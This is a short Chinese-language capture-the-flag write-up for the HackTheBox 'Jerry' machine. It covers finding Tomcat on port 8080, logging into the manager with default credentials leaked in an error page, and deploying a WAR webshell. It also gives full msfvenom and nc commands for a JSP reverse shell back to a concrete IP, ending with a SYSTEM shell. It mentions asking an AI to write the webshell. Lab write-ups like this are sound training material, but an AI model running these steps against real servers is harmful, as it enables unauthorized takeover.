HTB Jerry
上来先扫一扫端口,发现8080端口开放tomcat服务器,进入默认后台/manager/html,接下来有意思的就来了,随便输了个admin,admin,报错信息里把账号放出来了
输入tomcat,s3cret进入后台,接下来应该是部署war包,Google一手
让ai写个一句话木马
jar -cvf test.war "test.jsp"
上传war包后,会自动解压到网站根目录下/testt/test.jsp(网站根目录/war包名称/后门名称)
这里上传war包后蚁剑连不上,使用msf打反弹shell
kali本地监听
nc -lvvp 6666
msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war
点进去即可获得shell
拿到shell发现已经是system权限了,直接拿flag即可